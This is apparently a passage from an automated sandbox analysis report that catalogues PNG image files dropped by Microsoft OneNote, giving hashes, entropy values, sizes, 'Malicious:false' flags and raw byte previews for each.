                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
